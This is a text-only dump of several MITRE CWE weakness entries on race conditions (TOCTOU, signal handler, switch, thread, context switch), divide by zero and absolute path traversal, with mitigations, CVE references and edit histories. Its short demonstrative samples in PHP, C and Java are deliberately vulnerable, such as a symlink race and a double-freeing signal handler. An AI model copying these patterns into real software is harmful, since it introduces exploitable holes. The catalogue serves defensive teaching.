2021-03-15 - updated Demonstrative_Examples - - - Martin Sebor - Cisco Systems, Inc. - 2010-04-30 - Provided Demonstrative Example - - Race Conditions - Race Condition - - - - The software checks the status of a file or directory before accessing it, which produces a race condition in which the file can be replaced with a link before the access is performed, causing the software to access the wrong file. - While developers might expect that there is a very narrow time window between the time of check and time of use, there is still a race condition. An attacker could cause the software to slow down (e.g. with memory consumption), causing the time window to become larger. Alternately, in some situations, the attacker could win the race by performing a large number of attacks. - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Confidentiality - Integrity - Read Files or Directories - Modify Files or Directories - - - - - This code prints the contents of a file if a user has permission. - - function readFile($filename){ - $user = getCurrentUser(); - - //resolve file if its a symbolic link - if(is_link($filename)){$filename = readlink($filename);} - if(fileowner($filename) == $user){echo file_get_contents($realFile);return;}else{echo 'Access denied';return false;} - } - - This code attempts to resolve symbolic links before checking the file and printing its contents. However, an attacker may be able to change the file from a real file to a symbolic link between the calls to is_link() and file_get_contents(), allowing the reading of arbitrary files. Note that this code fails to log the attempted access (CWE-778). - - - - - Race condition enabling link following - - - POS35-C - Avoid race conditions while checking for the existence of a symbolic link - Exact - - - SFP20 - Race Condition Window - - - - - - - - - - This is already covered by the "Link Following" weakness (CWE-59). It is included here because so many people associate race conditions with link problems; however, not all link following issues involve race conditions. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description, Other_Notes, Relationships - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-12-13 - updated Other_Notes, Relationship_Notes - - - CWE Content Team - MITRE - 2011-03-29 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, References, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The software uses a signal handler that introduces a race condition. - - Race conditions frequently occur in signal handlers, since signal handlers support asynchronous actions. These race conditions have a variety of root causes and symptoms. Attackers may be able to exploit a signal handler race condition to cause the software state to be corrupted, possibly leading to a denial of service or even code execution. - These issues occur when non-reentrant functions, or state-sensitive actions occur in the signal handler, where they may be called at any time. These behaviors can violate assumptions being made by the "regular" code that is interrupted, or by other signal handlers that may also be invoked. If these functions are called at an inopportune moment - such as while a non-reentrant function is already running - memory corruption could occur that may be exploitable for code execution. Another signal race condition commonly found occurs when free is called within a signal handler, resulting in a double free and therefore a write-what-where condition. Even if a given pointer is set to NULL after it has been freed, a race condition still exists between the time the memory was freed and the pointer was set to NULL. This is especially problematic if the same signal handler has been set for more than one signal -- since it means that the signal handler itself may be reentered. - There are several known behaviors related to signal handlers that have received the label of "signal handler race condition": - - - Shared state (e.g. global data or static variables) that are accessible to both a signal handler and "regular" code - Shared state between a signal handler and other signal handlers - Use of non-reentrant functionality within a signal handler - which generally implies that shared state is being used. For example, malloc() and free() are non-reentrant because they may use global or static data structures for managing memory, and they are indirectly used by innocent-seeming functions such as syslog(); these functions could be exploited for memory corruption and, possibly, code execution. - Association of the same signal handler function with multiple signals - which might imply shared state, since the same code and resources are accessed. For example, this can be a source of double-free and use-after-free weaknesses. - Use of setjmp and longjmp, or other mechanisms that prevent a signal handler from returning control back to the original functionality - While not technically a race condition, some signal handlers are designed to be called at most once, and being called more than once can introduce security problems, even when there are not any concurrent calls to the signal handler. This can be a source of double-free and use-after-free weaknesses. - - - Signal handler vulnerabilities are often classified based on the absence of a specific protection mechanism, although this style of classification is discouraged in CWE because programmers often have a choice of several different mechanisms for addressing the weakness. Such protection mechanisms may preserve exclusivity of access to the shared resource, and behavioral atomicity for the relevant code: - - - Avoiding shared state - Using synchronization in the signal handler - Using synchronization in the regular code - Disabling or masking other signals, which provides atomicity (which effectively ensures exclusivity) - - - - - - - - - - - - - - - - Architecture and Design - - - Implementation - - - Medium - - - Integrity - Confidentiality - Availability - Modify Application Data - Modify Memory - DoS: Crash, Exit, or Restart - Execute Unauthorized Code or Commands - It may be possible to cause data corruption and possibly execute arbitrary code by modifying global variables or data structures at unexpected times, violating the assumptions of code that uses this global data. - - - Access Control - Gain Privileges or Assume Identity - If a signal handler interrupts code that is executing with privileges, it may be possible that the signal handler will also be executed with elevated privileges, possibly making subsequent exploits more severe. - - - - - Requirements - Language Selection - Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. - - - Architecture and Design - Design signal handlers to only set flags, rather than perform complex functionality. These flags can then be checked and acted upon within the main program loop. - - - Implementation - Only use reentrant functions within signal handlers. Also, use validation to ensure that state is consistent while performing asynchronous actions that affect the state of execution. - - - - - This code registers the same signal handler function with two different signals (CWE-831). If those signals are sent to the process, the handler creates a log message (specified in the first argument to the program) and exits. - - char *logMessage; - void handler (int sigNum) { - syslog(LOG_NOTICE, "%s\n", logMessage);free(logMessage); - /* artificially increase the size of the timing window to make demonstration of this weakness easier. */ - - sleep(10);exit(0); - } - int main (int argc, char* argv[]) { - logMessage = strdup(argv[1]); - /* Register signal handlers. */ - - signal(SIGHUP, handler);signal(SIGTERM, handler); - /* artificially increase the size of the timing window to make demonstration of this weakness easier. */ - - sleep(10); - } - - The handler function uses global state (globalVar and logMessage), and it can be called by both the SIGHUP and SIGTERM signals. An attack scenario might follow these lines: - - - - The program begins execution, initializes logMessage, and registers the signal handlers for SIGHUP and SIGTERM. - - - The program begins its "normal" functionality, which is simplified as sleep(), but could be any functionality that consumes some time. - - - The attacker sends SIGHUP, which invokes handler (call this "SIGHUP-handler"). - - - SIGHUP-handler begins to execute, calling syslog(). - - - syslog() calls malloc(), which is non-reentrant. malloc() begins to modify metadata to manage the heap. - - - The attacker then sends SIGTERM. - - - SIGHUP-handler is interrupted, but syslog's malloc call is still executing and has not finished modifying its metadata. - - - The SIGTERM handler is invoked. - - - SIGTERM-handler records the log message using syslog(), then frees the logMessage variable. - - - - At this point, the state of the heap is uncertain, because malloc is still modifying the metadata for the heap; the metadata might be in an inconsistent state. The SIGTERM-handler call to free() is assuming that the metadata is inconsistent, possibly causing it to write data to the wrong location while managing the heap. The result is memory corruption, which could lead to a crash or even code execution, depending on the circumstances under which the code is running. - Note that this is an adaptation of a classic example as originally presented by Michal Zalewski [REF-360]; the original example was shown to be exploitable for code execution. - Also note that the strdup(argv[1]) call contains a potential buffer over-read (CWE-126) if the program is called without any arguments, because argc would be 0, and argv[1] would point outside the bounds of the array. - - - The following code registers a signal handler with multiple signals in order to log when a specific event occurs and to free associated memory before exiting. - - #include <signal.h>#include <syslog.h>#include <string.h>#include <stdlib.h> - void *global1, *global2;char *what;void sh (int dummy) { - syslog(LOG_NOTICE,"%s\n",what);free(global2);free(global1); - /* Sleep statements added to expand timing window for race condition */ - - sleep(10);exit(0); - } - int main (int argc,char* argv[]) { - what=argv[1];global1=strdup(argv[2]);global2=malloc(340);signal(SIGHUP,sh);signal(SIGTERM,sh); - /* Sleep statements added to expand timing window for race condition */ - - sleep(10);exit(0); - } - - However, the following sequence of events may result in a double-free (CWE-415): - - - - a SIGHUP is delivered to the process - - - sh() is invoked to process the SIGHUP - - - This first invocation of sh() reaches the point where global1 is freed - - - At this point, a SIGTERM is sent to the process - - - the second invocation of sh() might do another free of global1 - - - this results in a double-free (CWE-415) - - - - This is just one possible exploitation of the above code. As another example, the syslog call may use malloc calls which are not async-signal safe. This could cause corruption of the heap management structures. For more details, consult the example within "Delivering Signals for Fun and Profit" [REF-360]. - - - - - CVE-1999-0035 - Signal handler does not disable other signal handlers, allowing it to be interrupted, causing other functionality to access files/etc. with raised privileges - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0035 - - - CVE-2001-0905 - Attacker can send a signal while another signal handler is already running, leading to crash or execution with root privileges - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0905 - - - CVE-2001-1349 - unsafe calls to library functions from signal handler - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1349 - - - CVE-2004-0794 - SIGURG can be used to remotely interrupt signal handler; other variants exist - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0794 - - - CVE-2004-2259 - SIGCHLD signal to FTP server can cause crash under heavy load while executing non-reentrant functions like malloc/free. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2259 - - - - Signals - Interprocess Communication - - - System Process - - - - Signal handler race condition - - - Signal Handling Race Conditions - - - Race condition in signal handler - - - SFP19 - Missing Lock - - - - - - - - - - - Probably under-studied. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-09-27 - updated Observed_Examples, References - - - CWE Content Team - MITRE - 2010-12-13 - updated Common_Consequences, Demonstrative_Examples, Description, Observed_Examples, Other_Notes, Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, References, Relationships - - - CWE Content Team - MITRE - 2014-06-23 - updated Demonstrative_Examples, References - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Potential_Mitigations - - - - - The code contains a switch statement in which the switched variable can be modified while the switch is still executing, resulting in unexpected behavior. - This issue is particularly important in the case of switch statements that involve fall-through style case statements - i.e., those which do not end with break. If the variable being tested by the switch changes in the course of execution, this could change the intended logic of the switch so much that it places the process in a contradictory state and in some cases could even result in memory corruption. - - - - - - - - - - - - - - Implementation - - - Medium - - - Integrity - Other - Alter Execution Logic - Unexpected State - This weakness may lead to unexpected system state, resulting in unpredictable behavior. - - - - - Implementation - Variables that may be subject to race conditions should be locked before the switch statement starts and only unlocked after the statement ends. - - - - - This example has a switch statement that executes different code depending on the current time. - - #include <sys/types.h>#include <sys/stat.h>int main(argc,argv){struct stat *sb;time_t timer;lstat("bar.sh",sb);printf("%d\n",sb->st_ctime);switch(sb->st_ctime % 2){case 0: printf("One option\n");break;case 1: printf("another option\n");break;default: printf("huh\n");break;}return 0;} - - It seems that the default case of the switch statement should never be reached, as st_ctime % 2 should always be 0 or 1. However, if st_ctime % 2 is 1 when the first case is evaluated, the time may change and st_ctime % 2 may be equal to 0 when the second case is evaluated. The result is that neither case 1 or case 2 execute, and the default option is chosen. - - - - - Race condition in switch - - - SFP19 - Missing Lock - - - - - - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-09-27 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, References, Relationships - - - CWE Content Team - MITRE - 2014-06-23 - updated Common_Consequences, Description, Other_Notes, Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, References, Relationships - - - - - If two threads of execution use a resource simultaneously, there exists the possibility that resources may be used while invalid, in turn making the state of execution undefined. - - - - - - - - - - - - - - Architecture and Design - - - Implementation - - - Medium - - - Integrity - Other - Alter Execution Logic - Unexpected State - The main problem is that -- if a lock is overcome -- data could be altered in a bad state. - - - - - Architecture and Design - Use locking functionality. This is the recommended solution. Implement some form of locking mechanism around code which alters or reads persistent data in a multithreaded environment. - - - Architecture and Design - Create resource-locking validation checks. If no inherent locking mechanisms exist, use flags and signals to enforce your own blocking scheme when resources are being used by other threads of execution. - - - - - The following example demonstrates the weakness. - - int foo = 0;int storenum(int num) {static int counter = 0;counter++;if (num > foo) foo = num;return foo;} - - - public classRace { - static int foo = 0;public static void main() { - - new Threader().start();foo = 1; - }public static class Threader extends Thread { - - public void run() {System.out.println(foo);} - } - } - - - - - System Process - - - - Race condition within a thread - - - CON32-C - Prevent data races when accessing bit-fields from multiple threads - CWE More Abstract - - - CON40-C - Do not refer to an atomic variable twice in an expression - CWE More Abstract - - - CON43-C - Do not allow data races in multithreaded code - Exact - - - VNA02-J - Ensure that compound operations on shared variables are atomic - - - VNA03-J - Do not assume that a group of calls to independently atomic methods is atomic - - - SFP19 - Missing Lock - - - - - - - - - - - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-09-27 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Demonstrative_Examples, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Potential_Mitigations - - - - - The software checks the state of a resource before using that resource, but the resource's state can change between the check and the use in a way that invalidates the results of the check. This can cause the software to perform invalid actions when the resource is in an unexpected state. - This weakness can be security-relevant when an attacker can influence the state of the resource between check and use. This can happen with shared resources such as files, memory, or even variables in multithreaded programs. - - - - - - - - - - TOCTTOU - The TOCTTOU acronym expands to "Time Of Check To Time Of Use". - - - TOCCTOU - The TOCCTOU acronym is most likely a typo of TOCTTOU, but it has been used in some influential documents, so the typo is repeated fairly frequently. - - - - - Implementation - - - Medium - - - Integrity - Other - Alter Execution Logic - Unexpected State - The attacker can gain access to otherwise unauthorized resources. - - - Integrity - Other - Modify Application Data - Modify Files or Directories - Modify Memory - Other - Race conditions such as this kind may be employed to gain read or write access to resources which are not normally readable or writable by the user in question. - - - Integrity - Other - Other - The resource in question, or other resources (through the corrupted one), may be changed in undesirable ways by a malicious user. - - - Non-Repudiation - Hide Activities - If a file or other resource is written in this method, as opposed to in a valid way, logging of the activity may not occur. - - - Non-Repudiation - Other - Other - In some cases it may be possible to delete files a malicious user might not otherwise have access to, such as log files. - - - - - Implementation - The most basic advice for TOCTOU vulnerabilities is to not perform a check before the use. This does not resolve the underlying issue of the execution of a function on a resource whose state and identity cannot be assured, but it does help to limit the false sense of security given by the check. - - - Implementation - When the file being altered is owned by the current user and group, set the effective gid and uid to that of the current user and group when executing this statement. - - - Architecture and Design - Limit the interleaving of operations on files from multiple processes. - - - Implementation - Architecture and Design - If you cannot perform operations atomically and you must share access to the resource between multiple processes or threads, then try to limit the amount of time (CPU cycles) between the check and use of the resource. This will not fix the problem, but it could make it more difficult for an attack to succeed. - - - Implementation - Recheck the resource after the use call to verify that the action was taken appropriately. - - - Architecture and Design - Ensure that some environmental locking mechanism can be used to protect resources effectively. - - - Implementation - Ensure that locking occurs before the check, as opposed to afterwards, such that the resource, as checked, is the same as it is when in use. - - - - - The following code checks a file, then updates its contents. - - struct stat *sb;...lstat("...",sb); // it has not been updated since the last time it was readprintf("stated file\n");if (sb->st_mtimespec==...){print("Now updating things\n");updateThings();} - - Potentially the file could have been updated between the time of the check and the lstat, especially since the printf has latency. - - - The following code is from a program installed setuid root. The program performs certain file operations on behalf of non-privileged users, and uses access checks to ensure that it does not use its root privileges to perform operations that should otherwise be unavailable the current user. The program uses the access() system call to check if the person running the program has permission to access the specified file before it opens the file and performs the necessary operations. - - if(!access(file,W_OK)) {f = fopen(file,"w+");operate(f);...}else { - - fprintf(stderr,"Unable to open file %s.\n",file); - } - - The call to access() behaves as expected, and returns 0 if the user running the program has the necessary permissions to write to the file, and -1 otherwise. However, because both access() and fopen() operate on filenames rather than on file handles, there is no guarantee that the file variable still refers to the same file on disk when it is passed to fopen() that it did when it was passed to access(). If an attacker replaces file after the call to access() with a symbolic link to a different file, the program will use its root privileges to operate on the file even if it is a file that the attacker would otherwise be unable to modify. By tricking the program into performing an operation that would otherwise be impermissible, the attacker has gained elevated privileges. This type of vulnerability is not limited to programs with root privileges. If the application is capable of performing any operation that the attacker would not otherwise be allowed perform, then it is a possible target. - - - This code prints the contents of a file if a user has permission. - - function readFile($filename){ - $user = getCurrentUser(); - - //resolve file if its a symbolic link - if(is_link($filename)){$filename = readlink($filename);} - if(fileowner($filename) == $user){echo file_get_contents($realFile);return;}else{echo 'Access denied';return false;} - } - - This code attempts to resolve symbolic links before checking the file and printing its contents. However, an attacker may be able to change the file from a real file to a symbolic link between the calls to is_link() and file_get_contents(), allowing the reading of arbitrary files. Note that this code fails to log the attempted access (CWE-778). - - - - - CVE-2003-0813 - A multi-threaded race condition allows remote attackers to cause a denial of service (crash or reboot) by causing two threads to process the same RPC request, which causes one thread to use memory after it has been freed. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0813 - - - CVE-2004-0594 - PHP flaw allows remote attackers to execute arbitrary code by aborting execution before the initialization of key data structures is complete. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0594 - - - CVE-2008-2958 - chain: time-of-check time-of-use (TOCTOU) race condition in program allows bypass of protection mechanism that was designed to prevent symlink attacks. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2958 - - - CVE-2008-1570 - chain: time-of-check time-of-use (TOCTOU) race condition in program allows bypass of protection mechanism that was designed to prevent symlink attacks. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1570 - - - - - Time-of-check Time-of-use race condition - - - File Access Race Conditions: TOCTOU - - - Time of check, time of use race condition - - - FIO01-C - Be careful using functions that use file names for identification - - - SFP20 - Race Condition Window - - - - - - - - - - - - - - TOCTOU issues do not always involve symlinks, and not every symlink issue is a TOCTOU problem. - Non-symlink TOCTOU issues are not reported frequently, but they are likely to occur in code that attempts to be secure. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - KDM Analytics - 2008-08-01 - added/updated white box definitions - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description, Name, Relationships - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-01-12 - updated Alternate_Terms, Observed_Examples, Other_Notes, References, Relationship_Notes, Relationships, Research_Gaps - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - KDM Analytics - 2009-07-17 - Improved the White_Box_Definition - - - CWE Content Team - MITRE - 2009-07-27 - updated White_Box_Definitions - - - CWE Content Team - MITRE - 2010-09-27 - updated Description, Relationships - - - CWE Content Team - MITRE - 2010-12-13 - updated Alternate_Terms, Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, Observed_Examples, References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Demonstrative_Examples, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Demonstrative_Examples, Likelihood_of_Exploit, References, Relationships, Taxonomy_Mappings, White_Box_Definitions - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - Time-of-check Time-of-use Race Condition - - - - A product performs a series of non-atomic actions to switch between contexts that cross privilege or other security boundaries, but a race condition allows an attacker to modify or misrepresent the product's behavior during the switch. - This is commonly seen in web browser vulnerabilities in which the attacker can perform certain actions while the browser is transitioning from a trusted to an untrusted domain, or vice versa, and the browser performs the actions on one domain using the trust level and resources of the other domain. - - - - - - - Primary - This weakness can be primary to almost anything, depending on the context of the race condition. - - - Resultant - This weakness can be resultant from insufficient compartmentalization (CWE-653), incorrect locking, improper initialization or shutdown, or a number of other weaknesses. - - - - - - - - Architecture and Design - - - Implementation - - - - - Integrity - Confidentiality - Modify Application Data - Read Application Data - - - - - CVE-2009-1837 - Chain: race condition (CWE-362) from improper handling of a page transition in web client while an applet is loading (CWE-368) leads to use after free (CWE-416) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1837 - - - CVE-2004-2260 - Browser updates address bar as soon as user clicks on a link instead of when the page has loaded, allowing spoofing by redirecting to another page using onUnload method. ** this is one example of the role of "hooks" and context switches, and should be captured somehow - also a race condition of sorts ** - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2260 - - - CVE-2004-0191 - XSS when web browser executes Javascript events in the context of a new page while it's being loaded, allowing interaction with previous page in different domain. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0191 - - - CVE-2004-2491 - Web browser fills in address bar of clicked-on link before page has been loaded, and doesn't update afterward. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2491 - - - - - Context Switching Race Condition - - - - - - - - - - - Can overlap signal handler race conditions. - Under-studied as a concept. Frequency unknown; few vulnerability reports give enough detail to know when a context switching race condition is a factor. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-07-27 - updated Description, Other_Notes, Relationship_Notes, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2010-12-13 - updated Observed_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The product divides a value by zero. - This weakness typically occurs when an unexpected value is provided to the product, or if an error occurs that is not properly detected. It frequently occurs in calculations involving physical dimensions such as size, length, width, and height. - - - - - - - - - Implementation - - - Medium - - - Availability - DoS: Crash, Exit, or Restart - A Divide by Zero results in a crash. - - - - - The following Java example contains a function to compute an average but does not validate that the input value used as the denominator is not zero. This will create an exception for attempting to divide by zero. If this error is not handled by Java exception handling, unexpected results can occur. - - public int computeAverageResponseTime (int totalTime, int numRequests) {return totalTime / numRequests;} - - By validating the input value used as the denominator the following code will ensure that a divide by zero error will not cause unexpected results. The following Java code example will validate the input value, output an error message, and throw an exception. - - public int computeAverageResponseTime (int totalTime, int numRequests) throws ArithmeticException {if (numRequests == 0) {System.out.println("Division by zero attempted!");throw ArithmeticException;}return totalTime / numRequests;} - - - - The following C/C++ example contains a function that divides two numeric values without verifying that the input value used as the denominator is not zero. This will create an error for attempting to divide by zero, if this error is not caught by the error handling capabilities of the language, unexpected results can occur. - - double divide(double x, double y){return x/y;} - - By validating the input value used as the denominator the following code will ensure that a divide by zero error will not cause unexpected results. If the method is called and a zero is passed as the second argument a DivideByZero error will be thrown and should be caught by the calling block with an output message indicating the error. - - const int DivideByZero = 10;double divide(double x, double y){if ( 0 == y ){throw DivideByZero;}return x/y;}...try{divide(10, 0);}catch( int i ){if(i==DivideByZero) {cerr<<"Divide by zero error";}} - - - - - - - The following C# example contains a function that divides two numeric values without verifying that the input value used as the denominator is not zero. This will create an error for attempting to divide by zero, if this error is not caught by the error handling capabilities of the language, unexpected results can occur. - - int Division(int x, int y){return (x / y);} - - The method can be modified to raise, catch and handle the DivideByZeroException if the input value used as the denominator is zero. - - int SafeDivision(int x, int y){try{return (x / y);}catch (System.DivideByZeroException dbz){System.Console.WriteLine("Division by zero attempted!");return 0;}} - - - - - - - - - CVE-2007-3268 - Invalid size value leads to divide by zero. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3268 - - - CVE-2007-2723 - "Empty" content triggers divide by zero. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2723 - - - CVE-2007-2237 - Height value of 0 triggers divide by zero. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2237 - - - - - A9 - Denial of Service - CWE More Specific - - - FLP03-C - Detect and handle floating point errors - - - INT33-C - Ensure that division and remainder operations do not result in divide-by-zero errors - Exact - - - NUM02-J - Ensure that division and modulo operations do not result in divide-by-zero errors - - - SFP1 - Glitch in computation - - - - - CWE Community - 2008-04-11 - Submitted by members of the CWE community to extend early CWE versions - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Description, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-10-29 - updated Other_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Demonstrative_Examples, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - - - A software system that accepts input in the form of a slash absolute path ('/absolute/pathname/here') without appropriate validation can allow an attacker to traverse the file system to unintended locations or access arbitrary files. - - - - - - - - - - Implementation - - - - - Confidentiality - Integrity - Read Files or Directories - Modify Files or Directories - - - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434. - Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string. - - High - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - CVE-2002-1345 - Multiple FTP clients write arbitrary files via absolute paths in server responses - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1345 - - - CVE-2001-1269 - ZIP file extractor allows full path - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1269 - - - CVE-2002-1818 - Path traversal using absolute pathname - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1818 - - - CVE-2002-1913 - Path traversal using absolute pathname - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1913 - - - CVE-2005-2147 - Path traversal using absolute pathname - 